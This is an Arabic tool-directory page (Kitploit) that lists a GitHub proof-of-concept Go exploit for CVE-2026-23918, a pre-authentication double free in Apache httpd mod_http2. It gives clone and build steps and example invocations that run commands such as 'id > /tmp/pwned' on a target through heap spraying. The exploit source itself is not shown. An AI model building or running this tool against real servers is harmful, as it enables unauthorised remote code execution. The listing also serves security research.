Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23918-Double-free-Apache-httpd-mod_http2 — تحرير مزدوج في تنظيف تيار mod_http2 في Apache httpd مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد قبل المصادقة | Kitploit
أدوات/GitHubGitHub/gagaltotal/cve-2026-23918-double-free-apache-httpd-mod_http2
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubgagaltotal/cve-2026-23918-double-free-apache-httpd-mod_http2

CVE-2026-23918-Double-free-Apache-httpd-mod_http2

تحرير مزدوج في تنظيف تيار mod_http2 في Apache httpd مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد قبل المصادقة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

CVE-2026-23918 - إثبات المفهوم لـ Apache httpd mod_http2

يحتوي هذا المستودع على تنفيذ إثبات المفهوم مكتوب بلغة Go لسيناريو تلف الذاكرة قبل المصادقة يؤثر على Apache httpd مع mod_http2. يوضح الكود في هذا المستودع نهج الرش والتحفيز ضد هدف ضعيف وهو مخصص لأبحاث الأمن المصرح بها والاختبار والتحليل الدفاعي.

نظرة عامة

يركز المشروع على إثبات مفهوم لاستغلال CVE-2026-23918 ويوفر تنفيذًا في ملف واحد في exploit_poc.go. يقوم البرنامج بما يلي:

  • بناء حمولة طلب HTTP مخصصة
  • القيام بنشاط رش الذاكرة ضد الخدمة المستهدفة
  • إرسال تسلسل تشغيل HTTP/2
  • محاولة تنفيذ أمر تم توفيره عبر مسار التنفيذ الضعيف

هذا المستودع ليس مخصصًا للاستخدام غير المصرح به ضد أنظمة طرف ثالث.

هيكل المشروع

  • exploit_poc.go - التنفيذ الرئيسي لـ Go لإثبات المفهوم
  • go.mod - تعريف وحدة Go
  • exploit - عناصر متعلقة بالمشروع أو أصول مساعدة
  • images - لقطات شاشة أو صور داعمة

المتطلبات الأساسية

قبل بناء أو تشغيل إثبات المفهوم، تأكد من توفر ما يلي:

  • Go 1.26.4 أو إصدار أحدث متوافق
  • صلاحيات الجذر إذا كنت تستخدم استخراج عنوان الذاكرة التلقائي عبر /proc//mem
  • وصول الشبكة إلى مثيل Apache httpd المستهدف
  • بيئة اختبار لديك الإذن بتقييمها

البناء والتثبيت الأولي

قم ببناء الثنائي باستخدام الأمر التالي:

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-23918-Double-free-Apache-httpd-mod_http2
cd CVE-2026-23918-Double-free-Apache-httpd-mod_http2
go mod init CVE-2026-23918-Double-free-Apache-httpd-mod_http2
go mod tidy
go run exploit_poc.go
go build -o exploit exploit_poc.go

ينتج عن هذا ملف قابل للتنفيذ باسم exploit في جذر المشروع.

الاستخدام

لقطة شاشة

لقطة شاشة

يدعم إثبات المفهوم وضعين للتشغيل:

1. الوضع التلقائي مع استخراج العنوان بناءً على PID

يتطلب هذا الوضع صلاحيات الجذر ويستخرج تلقائيًا عناوين الذاكرة المطلوبة من عملية العامل Apache المستهدفة.

root@kitploit:~
sudo ./exploit \
  --pid 1234 \
  --host 192.168.1.100 \
  --port 443 \
  --cmd "id > /tmp/pwned"

2. الوضع اليدوي مع عناوين صريحة

يتطلب هذا الوضع تقديم عناوين دالة system وفتحة طلب لوحة النتائج يدويًا.

root@kitploit:~
./exploit \
  --host 192.168.1.100 \
  --port 443 \
  --system 0x7f1234567890 \
  --scoreboard 0x7f1234000000 \
  --cmd "id > /tmp/pwned"

خيارات سطر الأوامر

الخيارات الرئيسية هي:

  • --host - اسم المضيف المستهدف أو عنوان IP
  • --port - المنفذ المستهدف (الافتراضي: 443)
  • --workers - عدد خيوط عمل الرش (الافتراضي: 32)
  • --cmd - الأمر المراد تنفيذه على الهدف
  • --pid - معرف عملية عامل Apache لاستخراج عنوان الذاكرة التلقائي
  • --system - عنوان رمز system في الوضع اليدوي
  • --scoreboard - عنوان فتحة طلب لوحة النتائج في الوضع اليدوي

أمثلة الأوامر

استخراج تلقائي وتنفيذ أمر

root@kitploit:~
sudo ./exploit --pid 1234 --host 10.0.0.20 --cmd "whoami"

الوضع اليدوي مع عناوين صريحة

root@kitploit:~
./exploit \
  --host 10.0.0.20 \
  --system 0x7f1234567890 \
  --scoreboard 0x7f1234000000 \
  --cmd "uname -a"

ملاحظات

  • قد يتسبب الاستغلال في تعطل الخدمة المستهدفة أو زعزعة استقرارها.
  • استخدم فقط ضد الأنظمة التي تمتلكها أو لديك الإذن الصريح باختبارها.
  • يتعامل البرنامج مع SIGINT و SIGTERM لإيقاف حلقة الرش بشكل أنيق.

الاستخدام المسؤول

يتم توفير هذا المستودع للأغراض التعليمية وتقييم الأمن الدفاعي. أي استخدام خارج بيئة خاضعة للرقابة ومصرح بها غير مشجع وقد ينتهك القوانين أو السياسات المعمول بها.

تنزيل الأداة